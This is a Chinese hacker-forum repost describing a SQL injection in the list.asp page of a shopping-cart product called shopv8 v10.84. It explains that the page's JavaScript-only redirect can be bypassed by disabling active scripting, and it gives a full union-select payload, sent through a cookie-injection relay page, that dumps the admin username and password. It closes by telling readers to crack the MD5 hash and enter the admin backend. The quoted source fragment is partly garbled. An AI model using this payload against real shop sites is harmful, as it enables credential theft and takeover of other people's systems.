转自:http://t00ls.net/thread-13776-1-1.html,作者:流浪的风,我仅做了排版、删减、与补充。
漏洞名称:shopv8 商城系统 v10.84 的注入漏洞
文章作者:流浪的风
作者Blog:http://www.st999.cn/blog
漏洞文件:list.asp
邯郸学步,按图索骥,大家不要笑了。感谢闷豆,k4shifz,寒心冰剑……,几位黑阔的帮忙。
部分源码: <%if IsNumeric(request.QueryString("id"))=False then <%dim bookid,action <!--#include file="webtop.asp"--> |
其中:
if not isinteger(id) then response.write"<script>alert(""非法访问!"");location.href=""index.asp"";</script>" |
没有以“Response.end”结束执行(Nuclear'Atk 补充:由于这样,只要禁止IE跳转就可以执行下一段代码了,这是个低级错误,可能程序员忘记写了),那么“request("id")”,我们也可以使用 cookies 给 id 赋值,那么注入就产生了。
只要把IE的安全设置设到最高(Nuclear'Atk 补充:或者在安全设置-->自定义级别里把“活动脚本选项”,选择禁止即可),就可以阻止网页跳转到index.asp页面了。(不知道这里的这样分析对不对,请大家指点)
利用方法:
一、先把安全设置设为最高(Nuclear'Atk 补充:或者在安全设置-->自定义级别里把“活动脚本选项”,选择禁止即可)。
把安全级别设置最高
禁止执行活动脚本
二、在注入点:http://127.0.0.1:99/list.asp?id=322,直接用注入中转器生成个页面,爆用户名和密码,如图:
注入语句: http://127.0.0.1:99/jmCook.asp?jmdcw=322%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,username,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53%20from%20admin |
三、在Md5查询的网站查出明文密码,然后进后台,做你要做的。